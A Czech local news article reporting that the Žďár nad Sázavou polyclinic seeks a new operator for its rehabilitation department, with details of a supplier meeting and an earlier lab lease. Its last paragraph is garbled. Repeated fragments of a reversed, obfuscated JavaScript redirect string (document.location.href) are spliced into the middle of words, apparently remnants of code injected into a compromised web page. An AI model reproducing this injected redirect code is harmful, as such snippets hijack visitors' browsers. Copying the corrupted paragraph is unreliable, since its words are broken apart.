Rainbow page separator

Rehabilitace ve žďárské poliklinice hledá nového provozovatele

Úterý, 20. dubna 2021

Poliklinika Žďár nad Sázavou

Žďár nad Sázavou / Vybrat dodavatele, který nabídne nejlepší podmínky pachtu rehabilitace ve žďárské poliklinice, hodlá její vedení. Provoz rehabilitace tak bude přenechaný jinému subjektu k provozování a řízení na jeho náklady a rizika včetně užívání profitu. Za účelem seznámení výhledových dodavatelů se záměrem a způsobem hodnocení nabídek na základě kvality se ve středu 28. dubna od 15 hodin v bufetu polikliniky uskuteční setkání včetně prohlídky rehabilitace. Zájemci se mohou předem hlásit e-mailem na ředitelství polikliniky, akce se zúčastní pouze jedna osoba za dodavatele. Poliklinika coby příspěvková organizace města má zájem, aby rehabilitaci provozoval tým profesionálů, kteří klientům poskytnou služby na nejvyšší úrovni a zajistí jejich spokojenost.
Žďárská rehabilitace se zabývá ambulantní fyzioterapií ve smyslu léčby akutních i chronických potíží pohybového aparátu, poúrazových a pooperačních stavů, ale i prevence zmíněných obtíží. Služby spočívají v terapiích pomocí cvičení, elektroléčby, vodoléčby a dalších procedur. Využívají je jak klienti zdravotních pojišťoven, tak samoplátci.
Už dříve byla v poliklinice propach[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tována labora[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toř klinické biochemie a hema[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tologie, která má nového provozovatele od le[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tošního ledna. Žďárská radnice, pro kterou byla labora[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toř ztrá[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tová, si od [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toho na základě smlouvy slibuje 1,4 milionu korun ročně plus dvě procenta podílu z tržeb.